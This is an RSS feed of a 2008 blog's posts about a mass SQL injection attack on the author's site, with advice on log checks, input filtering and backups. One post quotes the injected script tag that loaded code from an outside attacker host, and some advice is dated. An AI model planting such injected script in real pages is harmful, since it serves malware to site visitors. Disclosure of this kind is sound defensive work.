<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>rumblepup - entrepreneurial spirit &#187; sql injection</title>
	<atom:link href="http://www.rumblepup.com/tag/sql-injection/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.rumblepup.com</link>
	<description>I&#039;m not a player, I just crush a lot</description>
	<lastBuildDate>Sun, 11 Apr 2010 16:19:11 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>F-OFF mr sql injection hacker</title>
		<link>http://www.rumblepup.com/f-off-mr-sql-injection-hacker/</link>
		<comments>http://www.rumblepup.com/f-off-mr-sql-injection-hacker/#comments</comments>
		<pubDate>Mon, 09 Jun 2008 15:09:56 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[sql]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=34</guid>
		<description><![CDATA[Well, after we implemented our fix, mr. sql injecting hacker has been shown the door.  Today we were attacked three more times, both in the url and it seems in our open form fields, and as I&#8217;m apt to say when I do a beat down, FUACATA.
Bye bye sql injection hacker.
]]></description>
			<content:encoded><![CDATA[<p>Well, after we implemented our fix, mr. sql injecting hacker has been shown the door.  Today we were attacked three more times, both in the url and it seems in our open form fields, and as I&#8217;m apt to say when I do a beat down, FUACATA.</p>
<p>Bye bye sql injection hacker.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/f-off-mr-sql-injection-hacker/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>SQL injection attack.  Found the code being used.</title>
		<link>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/</link>
		<comments>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/#comments</comments>
		<pubDate>Fri, 06 Jun 2008 21:10:46 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[bomb]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[website hack]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=33</guid>
		<description><![CDATA[Ok, the latest state of sql injection attacks has been a nightmare.  We got hacked again, but this time, with an insertion at the url level.  These are a little easier to track. In the server logs, we found the following code in different formats.

Code was messing up my layout.  check out the [...]]]></description>
			<content:encoded><![CDATA[<p>Ok, the latest state of sql injection attacks has been a nightmare.  We got hacked again, but this time, with an insertion at the url level.  These are a little easier to track. In the server logs, we found the following code in different formats.</p>
<blockquote>
<h5><em>Code was messing up my layout.  Check out the text file <a href="http://www.rumblepup.com/sqlattack.txt">here</a>.<br />
</em></h5>
</blockquote>
<p>So look through your server logs for this code in the url with a GET statement.  Have your coder or web programmer disallow all of the elements being used in the statement.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Latest info on SQL injection attack.</title>
		<link>http://www.rumblepup.com/latest-info-on-sql-injection-attack/</link>
		<comments>http://www.rumblepup.com/latest-info-on-sql-injection-attack/#comments</comments>
		<pubDate>Fri, 06 Jun 2008 01:46:05 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[hack attempts]]></category>
		<category><![CDATA[spamming]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=32</guid>
		<description><![CDATA[I&#8217;ve been getting a lot of requests for information about how to patch this attack.  I&#8217;ve got to back up a minute and tell you that the attack is a pure sql injection attack.  Previously, I reported that it was a Windows vulnerability, however, upon further investigation, the server logs I looked at were only [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been getting a lot of requests for information about how to patch this attack.  I&#8217;ve got to back up a minute and tell you that the attack is a pure sql injection attack.  Previously, I reported that it was a Windows vulnerability, however, upon further investigation, the server logs I looked at were only &#8220;attempts&#8221; to find a vulnerability.</p>
<p>So I did some more research, and had a talk with <a href="http://jesscoburn.com/">Jess Coburn</a> with <a href="http://www.appliedi.net/">Windows Hosting</a> company Appliedi.net.  Although the attack seems like a Windows vulnerability, because of the attempts to gain entry through typical Windows Vulnerabilities, it&#8217;s not.  The media file attempts were only PART of the attempts made.  Apparently this attack is either preempted or followed up by various attempts to gain entry.  On our site, it was not a sql injection in the url, but a search form we had created that uses what&#8217;s called an &#8220;Enter Event.&#8221;  Quickly, most asp.net search forms eschew keyboard events in favor of click events that call javascript postbacks.  Meaning that if you have an asp.net search control on your website, a person has to click the search button instead of just hitting Enter.</p>
<p>Here lies the problem.  Users hate hitting search buttons, but love hitting their enter key.  Enter events are easy to create programmatically, thus so many forums and blogs get spammed and hacked all of the time.  However, javascript postbacks, not so much.   So far, from the little I do know, it&#8217;s very difficult to program a postback into a hack scan because it does not do a post or get the way most sites do.</p>
<p>But back to the problem and some solutions.</p>
<ol>
<li>Disallow all sql parameters in your form text fields.  There are plenty of tutorials on how to do this.</li>
<li>Read Jess&#8217;s blog, he has a TON of links to great source and a neat rollback sql function to fix these types of sql injections.</li>
<li>Remove &#8220;Enter Events&#8221; from your asp and asp.net forms.  Your users are going to have to click on the button for now.</li>
<li>Did I mention go to Jess&#8217;s blog?</li>
<li>Check for your most recent database backup.  If the offending script does not appear, you&#8217;ll have clean code and a timestamp for the last time your code was clean.</li>
<li>If you don&#8217;t do regular backups, start to get into the habit right NOW.  If you have to do a backup every 2 hours, then do it.  Keep copies online and off.  A reputable hosting company will allow you to make as many backups as you need.</li>
<li>Check your hosting company&#8217;s backup policy.  Appliedi.net backs up data at least twice in a 24 hour period.</li>
<li>If you&#8217;re on a dedicated box, assign some space and memory to run sql backup jobs automatically.  I&#8217;m doing some research on best practices.</li>
<li>During the hack attempt, or event, have a BIG GLASS OF SCOTCH, RUM, OR LIQUOR OF YOUR OWN CHOOSING.  These things are not easy to get through, but you need to relax or you&#8217;ll never get through it.</li>
<li>Be better prepared.  Just like a hurricane or earthquake, have a <strong>disaster plan</strong>.</li>
</ol>
<p>Hope this helps.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/latest-info-on-sql-injection-attack/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>The xiaobaishan bomb is now the flyzhu.9966 bomb.</title>
		<link>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/</link>
		<comments>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/#comments</comments>
		<pubDate>Wed, 04 Jun 2008 15:05:11 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[bomb]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=31</guid>
		<description><![CDATA[Updated from: The xiaobaishan bomb.
Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one.  We were hacked again, this time the script calling:
&#60;script src=http://flyzhu.9966.org/us/Help.asp&#62;&#60;/script&#62;
Tricky little fucker.
In fact, this hack is pretty well thought out.  Like I said on a previous [...]]]></description>
			<content:encoded><![CDATA[<p>Updated from: <a href="http://www.rumblepup.com/the-xiaobaishan-bomb-thousands-of-sites-hacked/">The xiaobaishan bomb.</a></p>
<p>Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one.  We were hacked again, this time the script calling:</p>
<blockquote><p>&lt;script src=http://<strong>flyzhu.9966.org</strong>/us/Help.asp&gt;&lt;/script&gt;</p></blockquote>
<p>Tricky little fucker.</p>
<p>In fact, this hack is pretty well thought out.  Like I said on a previous post, this was a sql injection, but our application is made to block sql injection of all kinds.  What happened?</p>
<p>This is a Windows vulnerability.  What the hacker did was attempt to run around the code and gain access to the asp.net Windows Media Player library via our /images/ folder.  They found an image they liked, they ran some kind of script, and gained access to run a sql insertion script that the application itself did not allow.</p>
<p><strong><span style="color: #993300;">UPDATE:</span> I&#8217;ve got <a href="http://www.rumblepup.com/latest-info-on-sql-injection-attack/">new info</a> on this. </strong> It&#8217;s a pure sql injection hack.</p>
<p>Sneaky fucker.</p>
<p><span style="text-decoration: line-through;">Apparently, this is a vulnerability that Microsoft put out a patch for, and our hosting provider didn&#8217;t run it against our VPS yet. </span></p>
<p><span style="color: #993300;"><strong>UPDATE:  Yes they did.  Whoopsee.</strong></span></p>
<p>So to protect your server against this hack, have your hosting provider run the latest updates for the vulnerability.</p>
<p>Right now, there are a reported 10,000 sites affected by this hack.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>
